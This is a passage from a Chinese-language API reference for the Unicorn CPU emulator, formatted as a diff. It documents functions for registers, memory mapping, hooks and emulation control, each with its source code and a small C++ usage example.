(UC_ERR_INSN_INVALID)"; + case UC_ERR_MAP: + return "Invalid memory mapping (UC_ERR_MAP)"; + case UC_ERR_WRITE_PROT: + return "Write to write-protected memory (UC_ERR_WRITE_PROT)"; + case UC_ERR_READ_PROT: + return "Read from non-readable memory (UC_ERR_READ_PROT)"; + case UC_ERR_FETCH_PROT: + return "Fetch from non-executable memory (UC_ERR_FETCH_PROT)"; + case UC_ERR_ARG: + return "Invalid argument (UC_ERR_ARG)"; + case UC_ERR_READ_UNALIGNED: + return "Read from unaligned memory (UC_ERR_READ_UNALIGNED)"; + case UC_ERR_WRITE_UNALIGNED: + return "Write to unaligned memory (UC_ERR_WRITE_UNALIGNED)"; + case UC_ERR_FETCH_UNALIGNED: + return "Fetch from unaligned memory (UC_ERR_FETCH_UNALIGNED)"; + case UC_ERR_RESOURCE: + return "Insufficient resource (UC_ERR_RESOURCE)"; + case UC_ERR_EXCEPTION: + return "Unhandled CPU exception (UC_ERR_EXCEPTION)"; + case UC_ERR_TIMEOUT: + return "Emulation timed out (UC_ERR_TIMEOUT)"; + } +} +``` + +使用示例: + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" +using namespace std; + +int main() +{ + uc_engine* uc; + uc_err err; + + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + if (!err) + cout << "uc实例创建成功" << endl; + + err = uc_errno(uc); + cout << "错误号: " << err << " 错误描述: " << uc_strerror(err) <<endl; + + err = uc_close(uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_close() with error returned: %u\n", err); + return -1; + } + if (!err) + cout << "uc实例关闭成功" << endl; + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/MbZk8KjQFqJOxmd.png) + + + +### uc_reg_write + +```c +uc_err uc_reg_write(uc_engine *uc, int regid, const void *value); +``` + +将值写入寄存器 + +``` +@uc: uc_open()返回的句柄 +@regid: 将被修改的寄存器ID +@value: 指向寄存器将被修改成的值的指针 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_reg_write(uc_engine *uc, int regid, const void *value) +{ + return uc_reg_write_batch(uc, ®id, (void *const *)&value, 1); +} + +uc_err uc_reg_write_batch(uc_engine *uc, int *ids, void *const *vals, int count) +{ + int ret = UC_ERR_OK; + if (uc->reg_write) + ret = uc->reg_write(uc, (unsigned int *)ids, vals, count); //结构体中写入 + else + return UC_ERR_EXCEPTION; + + return ret; +} +``` + +使用示例: + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" +using namespace std; + +int main() +{ + uc_engine* uc; + uc_err err; + + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + if (!err) + cout << "uc实例创建成功" << endl; + + int r_eax = 0x12; + err = uc_reg_write(uc, UC_X86_REG_ECX, &r_eax); + if (!err) + cout << "写入成功: " << r_eax << endl; + + err = uc_close(uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_close() with error returned: %u\n", err); + return -1; + } + if (!err) + cout << "uc实例关闭成功" << endl; + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/DkztJcigHCdmnRp.png) + + + +### uc_reg_read + +```c +uc_err uc_reg_read(uc_engine *uc, int regid, void *value); +``` + +读取寄存器的值 + +``` +@uc: uc_open()返回的句柄 +@regid: 将被读取的寄存器ID +@value: 指向保存寄存器值的指针 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_reg_read(uc_engine *uc, int regid, void *value) +{ + return uc_reg_read_batch(uc, ®id, &value, 1); +} + +uc_err uc_reg_read_batch(uc_engine *uc, int *ids, void **vals, int count) +{ + if (uc->reg_read) + uc->reg_read(uc, (unsigned int *)ids, vals, count); + else + return -1; + + return UC_ERR_OK; +} +``` + +使用示例: + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" +using namespace std; + +int main() +{ + uc_engine* uc; + uc_err err; + + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + if (!err) + cout << "uc实例创建成功" << endl; + + int r_eax = 0x12; + err = uc_reg_write(uc, UC_X86_REG_ECX, &r_eax); + if (!err) + cout << "写入成功: " << r_eax << endl; + + int recv_eax; + err = uc_reg_read(uc, UC_X86_REG_ECX, &recv_eax); + if (!err) + cout << "读取成功: " << recv_eax << endl; + + err = uc_close(uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_close() with error returned: %u\n", err); + return -1; + } + if (!err) + cout << "uc实例关闭成功" << endl; + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/ABkexFCfphu3zIg.png) + + + +### uc_reg_write_batch + +```c +uc_err uc_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count); +``` + +同时将多个值写入多个寄存器 + +``` +@uc: uc_open()返回的句柄 +@regid: 存储将被写入的多个寄存器ID的数组 +@value: 指向保存多个值的数组的指针 +@count: *regs 和 *vals 数组的长度 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_reg_write_batch(uc_engine *uc, int *ids, void *const *vals, int count) +{ + int ret = UC_ERR_OK; + if (uc->reg_write) + ret = uc->reg_write(uc, (unsigned int *)ids, vals, count); + else + return UC_ERR_EXCEPTION; + + return ret; +} +``` + +使用示例: + +```cpp +#include <iostream> +#include <string> +#include "unicorn/unicorn.h" +using namespace std; + +int syscall_abi[] = { + UC_X86_REG_RAX, UC_X86_REG_RDI, UC_X86_REG_RSI, UC_X86_REG_RDX, + UC_X86_REG_R10, UC_X86_REG_R8, UC_X86_REG_R9 +}; + +uint64_t vals[7] = { 200, 10, 11, 12, 13, 14, 15 }; + +void* ptrs[7]; + +int main() +{ + int i; + uc_err err; + uc_engine* uc; + + // set up register pointers + for (i = 0; i < 7; i++) { + ptrs[i] = &vals[i]; + } + + if ((err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc))) { + uc_perror("uc_open", err); + return 1; + } + + // reg_write_batch + printf("reg_write_batch({200, 10, 11, 12, 13, 14, 15})\n"); + if ((err = uc_reg_write_batch(uc, syscall_abi, ptrs, 7))) { + uc_perror("uc_reg_write_batch", err); + return 1; + } + + // reg_read_batch + memset(vals, 0, sizeof(vals)); + if ((err = uc_reg_read_batch(uc, syscall_abi, ptrs, 7))) { + uc_perror("uc_reg_read_batch", err); + return 1; + } + + printf("reg_read_batch = {"); + + for (i = 0; i < 7; i++) { + if (i != 0) printf(", "); + printf("%" PRIu64, vals[i]); + } + + printf("}\n"); + + uint64_t var[7] = { 0 }; + for (int i = 0; i < 7; i++) + { + cout << syscall_abi[i] << " "; + printf("%" PRIu64, vals[i]); + cout << endl; + } + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/l1AhdxgKE2U3tZB.png) + + + +### uc_reg_read_batch + +```c +uc_err uc_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count); +``` + +同时读取多个寄存器的值。 + +``` +@uc: uc_open()返回的句柄 +@regid: 存储将被读取的多个寄存器ID的数组 +@value: 指向保存多个值的数组的指针 +@count: *regs 和 *vals 数组的长度 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_reg_read_batch(uc_engine *uc, int *ids, void **vals, int count) +{ + if (uc->reg_read) + uc->reg_read(uc, (unsigned int *)ids, vals, count); + else + return -1; + + return UC_ERR_OK; +} +``` + +使用示例同uc_reg_write_batch()。 + + + +### uc_mem_write + +```c +uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *bytes, size_t size); +``` + +在内存中写入一段字节码。 + +``` + @uc: uc_open() 返回的句柄 + @address: 写入字节的起始地址 + @bytes: 指向一个包含要写入内存的数据的指针 + @size: 要写入的内存大小。 + + 注意: @bytes 必须足够大以包含 @size 字节。 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *_bytes, size_t size) +{ + size_t count = 0, len; + const uint8_t *bytes = _bytes; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + if (!check_mem_area(uc, address, size)) + return UC_ERR_WRITE_UNMAPPED; + + // 内存区域可以重叠相邻的内存块 + while(count < size) { + MemoryRegion *mr = memory_mapping(uc, address); + if (mr) { + uint32_t operms = mr->perms; + if (!(operms & UC_PROT_WRITE)) // 没有写保护 + // 标记为可写 + uc->readonly_mem(mr, false); + + len = (size_t)MIN(size - count, mr->end - address); + if (uc->write_mem(&uc->as, address, bytes, len) == false) + break; + + if (!(operms & UC_PROT_WRITE)) // 没有写保护 + // 设置写保护 + uc->readonly_mem(mr, true); + + count += len; + address += len; + bytes += len; + } else // 此地址尚未被映射 + break; + } + + if (count == size) + return UC_ERR_OK; + else + return UC_ERR_WRITE_UNMAPPED; +} +``` + +使用示例: + +```cpp +#include <iostream> +#include <string> +#include "unicorn/unicorn.h" +using namespace std; + +#define X86_CODE32 "\x41\x4a" // INC ecx; DEC edx +#define ADDRESS 0x1000 + +int main() +{ + uc_engine* uc; + uc_err err; + + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + if (uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1)) { + printf("Failed to write emulation code to memory, quit!\n"); + return -1; + } + + uint32_t code; + + if(uc_mem_read(uc,ADDRESS,&code, sizeof(code))) { + printf("Failed to read emulation code to memory, quit!\n"); + return -1; + } + + cout << hex << code << endl; + + err = uc_close(uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_close() with error returned: %u\n", err); + return -1; + } + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/l4HhgDzcJIVvFNU.png) + + + +### uc_mem_read + +```c +uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size); +``` + +从内存中读取字节。 + +``` + @uc: uc_open() 返回的句柄 + @address: 读取字节的起始地址 + @bytes: 指向一个包含要读取内存的数据的指针 + @size: 要读取的内存大小。 + + 注意: @bytes 必须足够大以包含 @size 字节。 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *_bytes, size_t size) +{ + size_t count = 0, len; + uint8_t *bytes = _bytes; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + if (!check_mem_area(uc, address, size)) + return UC_ERR_READ_UNMAPPED; + + // 内存区域可以重叠相邻的内存块 + while(count < size) { + MemoryRegion *mr = memory_mapping(uc, address); + if (mr) { + len = (size_t)MIN(size - count, mr->end - address); + if (uc->read_mem(&uc->as, address, bytes, len) == false) + break; + count += len; + address += len; + bytes += len; + } else // 此地址尚未被映射 + break; + } + + if (count == size) + return UC_ERR_OK; + else + return UC_ERR_READ_UNMAPPED; +} +``` + +使用示例同uc_mem_write() + + + +### uc_emu_start + +```c +uc_err uc_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count); +``` + +在指定的时间内模拟机器码。 + +``` +@uc: uc_open() 返回的句柄 +@begin: 开始模拟的地址 +@until: 模拟停止的地址 (当到达该地址时) +@timeout: 模拟代码的持续时间(以微秒计)。当这个值为0时,将在无限时间内模拟代码,直到代码完成。 +@count: 要模拟的指令数。当这个值为0时,将模拟所有可用的代码,直到代码完成 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_emu_start(uc_engine* uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count) +{ + // 重制计数器 + uc->emu_counter = 0; + uc->invalid_error = UC_ERR_OK; + uc->block_full = false; + uc->emulation_done = false; + uc->timed_out = false; + + switch(uc->arch) { + default: + break; +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: + uc_reg_write(uc, UC_M68K_REG_PC, &begin); + break; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: + switch(uc->mode) { + default: + break; + case UC_MODE_16: { + uint64_t ip; + uint16_t cs; + + uc_reg_read(uc, UC_X86_REG_CS, &cs); + // 抵消后面增加的 IP 和 CS + ip = begin - cs*16; + uc_reg_write(uc, UC_X86_REG_IP, &ip); + break; + } + case UC_MODE_32: + uc_reg_write(uc, UC_X86_REG_EIP, &begin); + break; + case UC_MODE_64: + uc_reg_write(uc, UC_X86_REG_RIP, &begin); + break; + } + break; +#endif +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: + uc_reg_write(uc, UC_ARM_REG_R15, &begin); + break; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: + uc_reg_write(uc, UC_ARM64_REG_PC, &begin); + break; +#endif +#ifdef UNICORN_HAS_MIPS + case UC_ARCH_MIPS: + // TODO: MIPS32/MIPS64/BIGENDIAN etc + uc_reg_write(uc, UC_MIPS_REG_PC, &begin); + break; +#endif +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: + // TODO: Sparc/Sparc64 + uc_reg_write(uc, UC_SPARC_REG_PC, &begin); + break; +#endif + } + + uc->stop_request = false; + + uc->emu_count = count; + // 如果不需要计数,则移除计数挂钩hook + if (count <= 0 && uc->count_hook != 0) { + uc_hook_del(uc, uc->count_hook); + uc->count_hook = 0; + } + // 设置计数hook记录指令数 + if (count > 0 && uc->count_hook == 0) { + uc_err err; + // 对计数指令的回调必须在所有其他操作之前运行,因此必须在hook列表的开头插入hook,而不是附加hook + uc->hook_insert = 1; + err = uc_hook_add(uc, &uc->count_hook, UC_HOOK_CODE, hook_count_cb, NULL, 1, 0); + // 恢复到 uc_hook_add() + uc->hook_insert = 0; + if (err != UC_ERR_OK) { + return err; + } + } + + uc->addr_end = until; + + if (timeout) + enable_emu_timer(uc, timeout * 1000); // microseconds -> nanoseconds + + if (uc->vm_start(uc)) { + return UC_ERR_RESOURCE; + } + + // 模拟完成 + uc->emulation_done = true; + + if (timeout) { + // 等待超时 + qemu_thread_join(&uc->timer); + } + + if(uc->timed_out) + return UC_ERR_TIMEOUT; + + return uc->invalid_error; +} +``` + +使用示例: + +```cpp +#include <iostream> +#include <string> +#include "unicorn/unicorn.h" +using namespace std; + +#define X86_CODE32 "\x33\xC0" // xor eax, eax +#define ADDRESS 0x1000 + +int main() +{ + uc_engine* uc; + uc_err err; + + int r_eax = 0x111; + + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + if (uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1)) { + printf("Failed to write emulation code to memory, quit!\n"); + return -1; + } + + uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); + printf(">>> before EAX = 0x%x\n", r_eax); + + err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); + if (err) { + printf("Failed on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } + + uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); + printf(">>> after EAX = 0x%x\n", r_eax); + + err = uc_close(uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_close() with error returned: %u\n", err); + return -1; + } + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/K4HMijIVt6lofvT.png) + + + +### uc_emu_stop + +```c +uc_err uc_emu_stop(uc_engine *uc); +``` + +停止模拟 + +通常是从通过 tracing API注册的回调函数中调用。 + +``` +@uc: uc_open() 返回的句柄 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_emu_stop(uc_engine *uc) +{ + if (uc->emulation_done) + return UC_ERR_OK; + + uc->stop_request = true; + + if (uc->current_cpu) { + // 退出当前线程 + cpu_exit(uc->current_cpu); + } + + return UC_ERR_OK; +} +``` + +使用示例: + +```cpp +uc_emu_stop(uc); +``` + + + +### uc_hook_add + +```c +uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, + void *user_data, uint64_t begin, uint64_t end, ...); +``` + +注册hook事件的回调,当hook事件被触发将会进行回调。 + +``` + @uc: uc_open() 返回的句柄 + @hh: 注册hook得到的句柄. uc_hook_del() 中使用 + @type: hook 类型 + @callback: 当指令被命中时要运行的回调 + @user_data: 用户自定义数据. 将被传递给回调函数的最后一个参数 @user_data + @begin: 回调生效区域的起始地址(包括) + @end: 回调生效区域的结束地址(包括) + 注意 1: 只有回调的地址在[@begin, @end]中才会调用回调 + 注意 2: 如果 @begin > @end, 每当触发此hook类型时都会调用回调 + @...: 变量参数 (取决于 @type) + 注意: 如果 @type = UC_HOOK_INSN, 这里是指令ID (如: UC_X86_INS_OUT) + + @return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, + void *user_data, uint64_t begin, uint64_t end, ...) +{ + int ret = UC_ERR_OK; + int i = 0; + + struct hook *hook = calloc(1, sizeof(struct hook)); + if (hook == NULL) { + return UC_ERR_NOMEM; + } + + hook->begin = begin; + hook->end = end; + hook->type = type; + hook->callback = callback; + hook->user_data = user_data; + hook->refs = 0; + *hh = (uc_hook)hook; + + // UC_HOOK_INSN 有一个额外参数:指令ID + if (type & UC_HOOK_INSN) { + va_list valist; + + va_start(valist, end); + hook->insn = va_arg(valist, int); + va_end(valist); + + if (uc->insn_hook_validate) { + if (! uc->insn_hook_validate(hook->insn)) { + free(hook); + return UC_ERR_HOOK; + } + } + + if (uc->hook_insert) { + if (list_insert(&uc->hook[UC_HOOK_INSN_IDX], hook) == NULL) { + free(hook); + return UC_ERR_NOMEM; + } + } else { + if (list_append(&uc->hook[UC_HOOK_INSN_IDX], hook) == NULL) { + free(hook); + return UC_ERR_NOMEM; + } + } + + hook->refs++; + return UC_ERR_OK; + } + + while ((type >> i) > 0) { + if ((type >> i) & 1) { + if (i < UC_HOOK_MAX) { + if (uc->hook_insert) { + if (list_insert(&uc->hook[i], hook) == NULL) { + if (hook->refs == 0) { + free(hook); + } + return UC_ERR_NOMEM; + } + } else { + if (list_append(&uc->hook[i], hook) == NULL) { + if (hook->refs == 0) { + free(hook); + } + return UC_ERR_NOMEM; + } + } + hook->refs++; + } + } + i++; + } + + if (hook->refs == 0) { + free(hook); + } + + return ret; +} +``` + +使用示例: + +```cpp +#include <iostream> +#include <string> +#include "unicorn/unicorn.h" +using namespace std; + +int syscall_abi[] = { + UC_X86_REG_RAX, UC_X86_REG_RDI, UC_X86_REG_RSI, UC_X86_REG_RDX, + UC_X86_REG_R10, UC_X86_REG_R8, UC_X86_REG_R9 +}; + +uint64_t vals[7] = { 200, 10, 11, 12, 13, 14, 15 }; + +void* ptrs[7]; + +void uc_perror(const char* func, uc_err err) +{ + fprintf(stderr, "Error in %s(): %s\n", func, uc_strerror(err)); +} + +#define BASE 0x10000 + +// mov rax, 100; mov rdi, 1; mov rsi, 2; mov rdx, 3; mov r10, 4; mov r8, 5; mov r9, 6; syscall +#define CODE "\x48\xc7\xc0\x64\x00\x00\x00\x48\xc7\xc7\x01\x00\x00\x00\x48\xc7\xc6\x02\x00\x00\x00\x48\xc7\xc2\x03\x00\x00\x00\x49\xc7\xc2\x04\x00\x00\x00\x49\xc7\xc0\x05\x00\x00\x00\x49\xc7\xc1\x06\x00\x00\x00\x0f\x05" + +void hook_syscall(uc_engine* uc, void* user_data) +{ + int i; + + uc_reg_read_batch(uc, syscall_abi, ptrs, 7); + + printf("syscall: {"); + + for (i = 0; i < 7; i++) { + if (i != 0) printf(", "); + printf("%" PRIu64, vals[i]); + } + + printf("}\n"); +} + +void hook_code(uc_engine* uc, uint64_t addr, uint32_t size, void* user_data) +{ + printf("HOOK_CODE: 0x%" PRIx64 ", 0x%x\n", addr, size); +} + +int main() +{ + int i; + uc_hook sys_hook; + uc_err err; + uc_engine* uc; + + for (i = 0; i < 7; i++) { + ptrs[i] = &vals[i]; + } + + if ((err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc))) { + uc_perror("uc_open", err); + return 1; + } + + printf("reg_write_batch({200, 10, 11, 12, 13, 14, 15})\n"); + if ((err = uc_reg_write_batch(uc, syscall_abi, ptrs, 7))) { + uc_perror("uc_reg_write_batch", err); + return 1; + } + + memset(vals, 0, sizeof(vals)); + if ((err = uc_reg_read_batch(uc, syscall_abi, ptrs, 7))) { + uc_perror("uc_reg_read_batch", err); + return 1; + } + + printf("reg_read_batch = {"); + + for (i = 0; i < 7; i++) { + if (i != 0) printf(", "); + printf("%" PRIu64, vals[i]); + } + + printf("}\n"); + + // syscall + printf("\n"); + printf("running syscall shellcode\n"); + + if ((err = uc_hook_add(uc, &sys_hook, UC_HOOK_CODE, hook_syscall, NULL, 1, 0))) { + uc_perror("uc_hook_add", err); + return 1; + } + + if ((err = uc_mem_map(uc, BASE, 0x1000, UC_PROT_ALL))) { + uc_perror("uc_mem_map", err); + return 1; + } + + if ((err = uc_mem_write(uc, BASE, CODE, sizeof(CODE) - 1))) { + uc_perror("uc_mem_write", err); + return 1; + } + + if ((err = uc_emu_start(uc, BASE, BASE + sizeof(CODE) - 1, 0, 0))) { + uc_perror("uc_emu_start", err); + return 1; + } + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/aU1lbmxMjXA5g3K.png) + +对每条指令都进行hook + + + +### uc_hook_del + +``` +uc_err uc_hook_del(uc_engine *uc, uc_hook hh); +``` + +删除一个已注册的hook事件 + +``` +@uc: uc_open() 返回的句柄 +@hh: uc_hook_add() 返回的句柄 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_hook_del(uc_engine *uc, uc_hook hh) +{ + int i; + struct hook *hook = (struct hook *)hh; + + for (i = 0; i < UC_HOOK_MAX; i++) { + if (list_remove(&uc->hook[i], (void *)hook)) { + if (--hook->refs == 0) { + free(hook); + break; + } + } + } + return UC_ERR_OK; +} +``` + +使用示例: + +```cpp +if ((err = uc_hook_add(uc, &sys_hook, UC_HOOK_CODE, hook_syscall, NULL, 1, 0))) { + uc_perror("uc_hook_add", err); + return 1; +} + +if ((err = uc_hook_del(uc, &sys_hook))) { + uc_perror("uc_hook_del", err); + return 1; +} +``` + + + +### uc_mem_map + +```c +uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); +``` + +为模拟映射一块内存。 + +``` +@uc: uc_open() 返回的句柄 +@address: 要映射到的新内存区域的起始地址。这个地址必须与4KB对齐,否则将返回UC_ERR_ARG错误。 +@size: 要映射到的新内存区域的大小。这个大小必须是4KB的倍数,否则将返回UC_ERR_ARG错误。 +@perms: 新映射区域的权限。参数必须是UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC或这些的组合,否则返回UC_ERR_ARG错误。 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms) +{ + uc_err res; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + res = mem_map_check(uc, address, size, perms); //内存安全检查 + if (res) + return res; + + return mem_map(uc, address, size, perms, uc->memory_map(uc, address, size, perms)); +} +``` + +使用示例同uc_hook_add。 + + + +### uc_mem_map_ptr + +```c +uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr); +``` + +在模拟中映射现有的主机内存。 + +``` +@uc: uc_open() 返回的句柄 +@address: 要映射到的新内存区域的起始地址。这个地址必须与4KB对齐,否则将返回UC_ERR_ARG错误。 +@size: 要映射到的新内存区域的大小。这个大小必须是4KB的倍数,否则将返回UC_ERR_ARG错误。 +@perms: 新映射区域的权限。参数必须是UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC或这些的组合,否则返回UC_ERR_ARG错误。 +@ptr: 指向支持新映射内存的主机内存的指针。映射的主机内存的大小应该与size的大小相同或更大,并且至少使用PROT_READ | PROT_WRITE进行映射,否则不定义映射。 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr) +{ + uc_err res; + + if (ptr == NULL) + return UC_ERR_ARG; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + res = mem_map_check(uc, address, size, perms); //内存安全检查 + if (res) + return res; + + return mem_map(uc, address, size, UC_PROT_ALL, uc->memory_map_ptr(uc, address, size, perms, ptr)); +} +``` + +使用示例同uc_mem_map + + + +### uc_mem_unmap + +```c +uc_err uc_mem_unmap(uc_engine *uc, uint64_t address, size_t size); +``` + +取消对模拟内存区域的映射 + +``` +@uc: uc_open() 返回的句柄 +@address: 要映射到的新内存区域的起始地址。这个地址必须与4KB对齐,否则将返回UC_ERR_ARG错误。 +@size: 要映射到的新内存区域的大小。这个大小必须是4KB的倍数,否则将返回UC_ERR_ARG错误。 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_mem_unmap(struct uc_struct *uc, uint64_t address, size_t size) +{ + MemoryRegion *mr; + uint64_t addr; + size_t count, len; + + if (size == 0) + // 没有要取消映射的区域 + return UC_ERR_OK; + + // 地址必须对齐到 uc->target_page_size + if ((address & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // 大小必须是 uc->target_page_size 的倍数 + if ((size & uc->target_page_align) != 0) + return UC_ERR_ARG; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + // 检查用户请求的整个块是否被映射 + if (!check_mem_area(uc, address, size)) + return UC_ERR_NOMEM; + + // 如果这个区域跨越了相邻的区域,可能需要分割区域 + addr = address; + count = 0; + while(count < size) { + mr = memory_mapping(uc, addr); + len = (size_t)MIN(size - count, mr->end - addr); + if (!split_region(uc, mr, addr, len, true)) + return UC_ERR_NOMEM; + + // 取消映射 + mr = memory_mapping(uc, addr); + if (mr != NULL) + uc->memory_unmap(uc, mr); + count += len; + addr += len; + } + + return UC_ERR_OK; +} +``` + +使用示例: + +```cpp +if ((err = uc_mem_map(uc, BASE, 0x1000, UC_PROT_ALL))) { + uc_perror("uc_mem_map", err); + return 1; +} + +if ((err = uc_mem_unmap(uc, BASE, 0x1000))) { + uc_perror("uc_mem_unmap", err); + return 1; +} +``` + + + +### uc_mem_protect + +```c +uc_err uc_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); +``` + +设置模拟内存的权限 + +``` +@uc: uc_open() 返回的句柄 +@address: 要映射到的新内存区域的起始地址。这个地址必须与4KB对齐,否则将返回UC_ERR_ARG错误。 +@size: 要映射到的新内存区域的大小。这个大小必须是4KB的倍数,否则将返回UC_ERR_ARG错误。 +@perms: 映射区域的新权限。参数必须是UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC或这些的组合,否则返回UC_ERR_ARG错误。 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_mem_protect(struct uc_struct *uc, uint64_t address, size_t size, uint32_t perms) +{ + MemoryRegion *mr; + uint64_t addr = address; + size_t count, len; + bool remove_exec = false; + + if (size == 0) + // trivial case, no change + return UC_ERR_OK; + + // address must be aligned to uc->target_page_size + if ((address & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // size must be multiple of uc->target_page_size + if ((size & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // check for only valid permissions + if ((perms & ~UC_PROT_ALL) != 0) + return UC_ERR_ARG; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + // check that user's entire requested block is mapped + if (!check_mem_area(uc, address, size)) + return UC_ERR_NOMEM; + + // Now we know entire region is mapped, so change permissions + // We may need to split regions if this area spans adjacent regions + addr = address; + count = 0; + while(count < size) { + mr = memory_mapping(uc, addr); + len = (size_t)MIN(size - count, mr->end - addr); + if (!split_region(uc, mr, addr, len, false)) + return UC_ERR_NOMEM; + + mr = memory_mapping(uc, addr); + // will this remove EXEC permission? + if (((mr->perms & UC_PROT_EXEC) != 0) && ((perms & UC_PROT_EXEC) == 0)) + remove_exec = true; + mr->perms = perms; + uc->readonly_mem(mr, (perms & UC_PROT_WRITE) == 0); + + count += len; + addr += len; + } + + // if EXEC permission is removed, then quit TB and continue at the same place + if (remove_exec) { + uc->quit_request = true; + uc_emu_stop(uc); + } + + return UC_ERR_OK; +} +``` + +使用示例: + +```cpp +if ((err = uc_mem_protect(uc, BASE, 0x1000, UC_PROT_ALL))) { //可读可写可执行 + uc_perror("uc_mem_protect", err); + return 1; +} +``` + + + +### uc_mem_regions + +```c +uc_err uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count); +``` + +检索由 uc_mem_map() 和 uc_mem_map_ptr() 映射的内存的信息。 + +这个API为@regions分配内存,用户之后必须通过free()释放这些内存来避免内存泄漏。 + +``` +@uc: uc_open() 返回的句柄 +@regions: 指向 uc_mem_region 结构体的数组的指针. 由Unicorn申请,必须通过uc_free()释放这些内存 +@count: 